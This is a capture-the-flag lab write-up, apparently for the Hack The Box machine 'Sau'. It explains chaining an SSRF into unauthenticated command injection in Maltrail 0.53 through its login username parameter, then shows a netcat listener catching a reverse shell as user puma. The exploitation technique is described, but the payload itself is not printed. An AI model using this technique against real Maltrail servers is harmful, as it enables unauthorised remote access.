Unauthenticated OS Command Injection
As identified previously, the target is running an outdated Maltrail instance, version 0.53, which is vulnerable to unauthenticated OS command injection.
The bug is straightforward to exploit: the username parameter of the login request ends up inside a shell command, so a value containing `;` (to terminate the server's own command) and backticks (to run a command of our choosing) gets executed as the user Maltrail runs as.
This is the POST data with the payload in the username parameter.
Since I am exploiting an internal web service via the SSRF, I cannot send that POST directly; I have to find a way to deliver the same request through the forward URL.
In Burp Suite I can change the request method to GET, which moves the form parameters into the query string and gives me the complete payload as a single URL.
This works because Maltrail accepts the parameter from the query string as well as from the request body, so both requests achieve the same thing.
Like so.
Then I update the proxy configuration with the complete payload URL, start a listener, and trigger the request.
Accessing the /ssrf endpoint
┌──(kali㉿kali)-[~/archive/htb/labs/sau]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.11.224] 35882
whoami
puma
hostname
sau
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.224 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:cef1 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:cef1 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:ce:f1 txqueuelen 1000 (Ethernet)
RX packets 8992892 bytes 884337958 (884.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11268096 bytes 20908198778 (20.9 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 77 bytes 13915 (13.9 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 77 bytes 13915 (13.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Initial foothold established as the puma user via RCE through SSRF (CVE-2023-27163).